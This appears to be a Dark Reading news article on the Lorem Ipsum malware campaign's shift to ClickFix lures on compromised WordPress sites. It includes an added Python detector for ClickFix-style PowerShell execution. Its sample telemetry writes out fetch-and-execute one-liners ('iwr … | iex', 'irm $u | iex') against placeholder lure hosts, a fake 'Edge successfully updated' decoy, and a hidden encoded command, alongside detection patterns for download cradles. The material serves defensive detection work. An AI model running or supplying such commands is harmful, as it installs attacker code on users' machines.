
'Lorem Ipsum' Malware Pivots to ClickFix Delivery

Dark Reading, archived Jun 16, 2026

New analysis shows the campaign, which uses compromised WordPress sites, may be linked to the ransomware and data extortion group Vice Society.



Jai Vijayan, Contributing Writer
June 16, 2026
4 Min Read

Microsoft's disruption of malware-signing-as-a-service provider Fox Tempest last month has forced the operators of the Lorem Ipsum shellcode loader and backdoor to abandon their delivery method of Trojanized Microsoft Teams installers in favor of ClickFix lures.

Researchers at BlueVoyant, who have tracked the Lorem Ipsum campaign since February 2026, observed the shift in late May, just days after Microsoft dismantled the Fox Tempest (aka Forging Marauder) infrastructure and revoked more than 1,000 fraudulently obtained Microsoft Trusted Signing certificates.

While the takedown may have temporarily disrupted the threat actors behind Lorem Ipsum, they quickly moved to a new and potentially more dangerous delivery model.

Making a Quick Pivot to ClickFix

"The loss of certificate supply rendered the previous signed-installer delivery model unviable, forcing the operators to adopt a delivery mechanism that eliminates code signing entirely," BlueVoyant said in its report on Tuesday.

Instead, the threat actors are now relying on ClickFix lures hosted on compromised WordPress sites to deliver their malware. "The pivot significantly broadens the potential victim pool from users who encountered fake Microsoft Teams installers on SEO-poisoned and malvertised download portals to anyone browsing one of the compromised WordPress sites," the company noted.

BlueVoyant had initially assessed Lorem Ipsum to be a rapidly maturing malware campaign, launched in February 2026, likely operated by a sophisticated, mid-tier initial access broker. The company has since revised that assessment and now strongly believes the campaign is linked to Rapid Brigantine, a financially motivated cybercriminal group also tracked as Vanilla Tempest, DEV-0832, and Vice Society. The threat actor has been active since at least mid-2022 and is associated with multiple ransomware families including Rhysida, BlackCat, Zeppelin, and Quantum Locker, according to BlueVoyant.

The Lorem Ipsum campaign initially relied on SEO poisoning to lure users into downloading Trojanized Microsoft Teams installers signed with valid Microsoft Trusted Signing certificates. Victims who ran the fake installers unknowingly deployed a multistage shellcode loader and backdoor that gave the attackers a foothold on their systems.

BlueVoyant's analysis found Lorem Ipsum using a sophisticated, multistage infection chain with DLL sideloading, encrypted payloads, and a command-and-control (C2) mechanism that abused the legitimate Indian blogging platform LetsDiskuss[.]com as a dead drop to retrieve C2 server addresses. The malware also assigns unique identifiers to track and manage individual victim infections, according to BlueVoyant.

ClickFix Lures on WordPress Sites

For the new ClickFix delivery model, Lorem Ipsum's operator is currently using at least five legitimate but compromised WordPress websites to host its ClickFix lures. The attack chain begins when a user arrives at one of the websites, which span multiple sectors including architecture, legal services, and construction technology. An injected iframe on the website displays a fake notification that the user's browser is out of date. In a manner similar to other ClickFix scams, the pop-up instructs the user to paste a provided PowerShell command, disguised as a Microsoft Edge security intelligence update, into their Windows Terminal.

Running that command silently downloads and executes the Lorem Ipsum malware in the background while displaying a fake success message telling the user their browser has been successfully updated.

A Troubling Connection to Ransomware Actors

BlueVoyant's view that Lorem Ipsum is linked to Rapid Brigantine is significant for defenders because it suggests the campaign is part of a broader ransomware operation with a history of deploying destructive payloads against victims.

According to the security vendor, there are multiple indicators that the two operations are linked. These include a Microsoft report in October 2025 that described an SEO poisoning-driven Vanilla Tempest campaign involving Teams installers; the shared use of Forging Marauder/Fox Tempest for obtaining malware signing certificates; and a DFIR report in which a Lorem Ipsum-associated loader delivered a backdoor associated with Rapid Brigantine.

The Lorem Ipsum campaign is the latest example of the resilience modern threat actors have built up against attempts to disrupt their operations. Rather than allowing Microsoft's takedown of the Fox Tempest signing service to halt their operations, Lorem Ipsum actors pivoted to a new delivery model that has actually heightened their threat profile.

For defenders, the broader implication is that detection and prevention strategies cannot rely on assumptions about initial access vectors. Instead, organizations need to anticipate fast-moving, multichannel delivery models that combine social engineering, legitimate Web infrastructure abuse, and user execution of malicious commands, BlueVoyant noted.
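BlueVoyant's point above is that the reliable signal is the user-executed command itself, not the installer hash or lure domain that changes with every pivot. The following Python script is an added illustration of that approach; it is not BlueVoyant's or Dark Reading's code, and its process-creation events, file paths, lure hostnames (all under the reserved .invalid domain), regexes and thresholds are constructed for the example. It scores a PowerShell process spawned from an interactive shell (Windows Terminal, cmd.exe or the Explorer Run dialog, the "paste this into your terminal" step of a ClickFix lure) on recurring behaviors such as a hidden window, a download cradle piped into inline execution, an encoded command, and a decoy "browser updated" message. It runs a static hostname blocklist over the same events to show why that alone misses a variant that changed nothing but its lure host.

```python
"""Behavioral detection for ClickFix-style 'paste this into your terminal' lures.

Added example: the events, paths, hostnames and thresholds below are constructed
for illustration and are not from BlueVoyant's report. The fields consulted
(parent image, image, command line) are what Sysmon Event ID 1 or an EDR
process-creation event records as ParentImage, Image and CommandLine.
"""
import re
from dataclasses import dataclass, field
from urllib.parse import urlparse

# Shells a user pastes into: the ClickFix step is "paste this into Windows Terminal".
INTERACTIVE_PARENTS = {"windowsterminal.exe", "openconsole.exe", "cmd.exe", "explorer.exe"}
POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}

# Behaviors that recur across ClickFix variants regardless of lure host or payload.
BEHAVIOR_PATTERNS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "encoded_command": re.compile(r"-e(?:nc(?:odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "download_cradle": re.compile(
        r"Invoke-WebRequest|\biwr\b|Invoke-RestMethod|\birm\b|\bcurl\b|\bwget\b"
        r"|DownloadString|DownloadFile|Net\.WebClient", re.I),
    "inline_execute": re.compile(r"Invoke-Expression|\biex\b|\|\s*&\s|Start-Process", re.I),
    # The fake "your browser has been updated" message shown to the victim.
    "decoy_message": re.compile(r"(?:Write-Host|echo)\b[^;]*\b(?:updated|verified|success)", re.I),
}

# Constructed: the single lure host an analyst has already blocklisted.
KNOWN_LURE_HOSTS = {"lure-one.invalid"}


@dataclass
class ProcessEvent:
    parent_image: str
    image: str
    command_line: str


@dataclass
class Verdict:
    flagged: bool
    behaviors: list = field(default_factory=list)
    reason: str = ""


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyze(event: ProcessEvent) -> Verdict:
    """Behavioral verdict: interactive PowerShell that fetches-and-runs, or hides an encoded command."""
    if _basename(event.image) not in POWERSHELL_IMAGES:
        return Verdict(False, [], "not a PowerShell host")
    behaviors = [name for name, rx in BEHAVIOR_PATTERNS.items() if rx.search(event.command_line)]
    if _basename(event.parent_image) not in INTERACTIVE_PARENTS:
        return Verdict(False, behaviors, "not launched from an interactive shell")
    if "download_cradle" in behaviors and "inline_execute" in behaviors:
        return Verdict(True, behaviors, "interactive PowerShell fetching and executing remote content")
    if "hidden_window" in behaviors and "encoded_command" in behaviors:
        return Verdict(True, behaviors, "interactive PowerShell running a hidden encoded command")
    return Verdict(False, behaviors, "no ClickFix-style behavior combination")


def static_ioc_match(event: ProcessEvent, known_hosts=KNOWN_LURE_HOSTS) -> bool:
    """The brittle alternative: match only hostnames already on a blocklist."""
    urls = re.findall(r"https?://[^\s'\"|;]+", event.command_line)
    return any(urlparse(u).hostname in known_hosts for u in urls)


def run_detection(events):
    """Return (index, behavioral verdict, static hit) for each event."""
    return [(i, analyze(e), static_ioc_match(e)) for i, e in enumerate(events)]


# Constructed sample telemetry: two ClickFix-style pastes (the second changed only its lure host),
# a benign admin one-liner, a scheduled script, and a hidden encoded command from the Run dialog.
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Program Files\WindowsApps\WindowsTerminal.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell -w hidden -c \"iwr https://lure-one.invalid/edge-si-update -UseBasicParsing"
                 " | iex; Write-Host 'Microsoft Edge successfully updated'\""),
    ProcessEvent(r"C:\Windows\System32\cmd.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell.exe -NoProfile -WindowStyle Hidden -Command"
                 " \"$u='https://lure-two.invalid/update'; irm $u | iex\""),
    ProcessEvent(r"C:\Program Files\WindowsApps\WindowsTerminal.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell -c \"Get-Service | Where-Object Status -eq Running\""),
    ProcessEvent(r"C:\Windows\System32\svchost.exe",
                 r"C:\Program Files\PowerShell\7\pwsh.exe",
                 r"pwsh -ExecutionPolicy Bypass -File C:\scripts\nightly-backup.ps1"),
    ProcessEvent(r"C:\Windows\explorer.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell -w hidden -enc QQBBAEEAQQBBAEEAQQBBAEEAQQBBAEEAQQBBAA=="),  # constructed blob
]

if __name__ == "__main__":
    for i, verdict, static_hit in run_detection(SAMPLE_EVENTS):
        print(f"event {i}: behavioral={'ALERT' if verdict.flagged else 'ok'} static={static_hit}"
              f" behaviors={verdict.behaviors} ({verdict.reason})")
```

Run directly, the script alerts on events 0, 1 and 4 and stays quiet on the admin one-liner and the scheduled task, while the static check hits only event 0: the variant at index 1 kept every behavior and swapped the hostname, which is exactly the kind of pivot the article describes. The two rule combinations (download cradle plus inline execution, hidden window plus encoded command) are deliberately conjunctive so that a lone `iwr` in an analyst's terminal does not page anyone; tune the parent list and patterns to your own telemetry.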
"Defending against this ClickFix campaign and the broader Rapid Brigantine post-exploitation activity that typically follows requires prioritizing behavioral detections over static indicators, given the operators' demonstrated capacity for rapid pivot in response to disruption," the security vendor said. "The most operationally valuable controls focus on the consistent behaviors that span Rapid Brigantine's multiple delivery pipelines," rather than individual delivery mechanisms or malware variants.

About the Author

Jai Vijayan, Contributing Writer

Illinois-based Jai Vijayan is a veteran, award-winning technology journalist with more than 25 years of experience covering cybersecurity. His information security reporting has explored everything from ransomware, nation-state threats, and identity security to AI risk, critical infrastructure protection, software supply chain security, cloud security, and emerging enterprise technologies.

Over the course of his career, Jai has written news stories, feature articles, survey reports, white papers, and e-books for enterprise and technology audiences. He has also moderated panel discussions and executive roundtables featuring CISOs, security researchers, and industry leaders.

Jai previously served as senior editor at Computerworld, where he covered information security and data-privacy issues. His work has also appeared in CSO Online, InformationWeek, The Christian Science Monitor Passcode, The Economic Times, and other publications. His work has earned multiple industry honors, including a Joint ASBPE Excellence Award for Best Coverage of Government IT and a Joint Jesse H. Neal Award for wireless LAN security coverage. Jai holds a Master's degree in statistics from Bangalore University, and studied broadcasting and electronic communication at Marquette University in Milwaukee.